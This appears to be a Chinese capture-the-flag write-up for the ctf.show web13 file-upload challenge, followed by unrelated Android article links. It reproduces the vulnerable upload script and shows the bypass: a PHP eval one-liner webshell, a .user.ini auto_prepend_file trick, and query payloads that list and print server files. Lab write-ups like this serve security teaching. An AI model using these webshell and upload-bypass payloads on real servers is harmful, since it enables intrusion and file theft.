ctf.show_web13

上传一句话木马 1.php文件,显示

再改后缀为.jpg,显示错误文件大小

用dirsearch扫一下

备份文件.bak

下载文件源码

php 复制代码
<?php 
	header("content-type:text/html;charset=utf-8");
	$filename = $_FILES['file']['name'];
	$temp_name = $_FILES['file']['tmp_name'];
	$size = $_FILES['file']['size'];
	$error = $_FILES['file']['error'];
	$arr = pathinfo($filename);
	$ext_suffix = $arr['extension'];
	if ($size > 24){
		die("error file zise");
	}
	if (strlen($filename)>9){
		die("error file name");
	}
	if(strlen($ext_suffix)>3){
		die("error suffix");
	}
	if(preg_match("/php/i",$ext_suffix)){
		die("error suffix");
    }
    if(preg_match("/php/i"),$filename){
        die("error file name");
    }
	if (move_uploaded_file($temp_name, './'.$filename)){
		echo "文件上传成功!";
	}else{
		echo "文件上传失败!";
	}

 ?>

要求文件大小少于24字节,文件名少于九个字节,后缀小于三个字节,并且后缀不能是.php ,文件名不能为php。

构造一个一句话的文本文件a.txt,大小刚好24

<?php eval($_POST'a');

然后构造一个.user.ini文件

auto_prepend_file=a.txt // 意思是所有a.txt文件都以php文件方式打开

在.usr.ini中如果设置了文件名,那么任意一个页面都会将该文件中的内容包含进去。在 .usr.ini 中输入 auto_prepend_file =a.txt,这样在该目录下的所有文件都会包含 a.txt 的内容 。

上传成功之后,但蚁剑这里连接不上,可能是.txt文件蚁剑无法通过php进行解析吧。第二种方法:

?a=print_r(glob("*")); // 显示所有文件

?a=highlight_file("文件名"); //显示文件到前端

记得后面要打 ;

相关推荐
风和先行3 分钟前
Android 数据库相关学习总结
android·数据库·学习
杉氧19 分钟前
Compose 渲染内核 (3):Slot Table 与 Gap Buffer —— 极速重组的数学艺术
android·架构·android jetpack
阿巴斯甜1 小时前
ContentObserver的使用:
android
casual_clover1 小时前
【Android 控件】使用 Navigation 实现底部导航功能时左右滑动退出页面功能
android·底部导航滑动退出
urkay-1 小时前
Kotlin Flow分类
android·开发语言·kotlin
阿pin2 小时前
Android随笔-MVC/MVP/MVVM/MVI
android·mvc·mvvm·mvp·mvi
阿pin3 小时前
Android随笔-View绘制流程
android·开发语言·view
2501_916008893 小时前
iOS 证书管理最佳实践 从创建到续期的完整指南
android·ios·小程序·https·uni-app·iphone·webview
Digitally3 小时前
9 款优质无线传输软件,实现安卓设备与电脑互传数据
android·电脑
私人珍藏库12 小时前
[Android] PeakFinder AR v4.8.89 (山峰全景识别+增强现实山峰查看器)
android·人工智能·智能手机·ar·工具·软件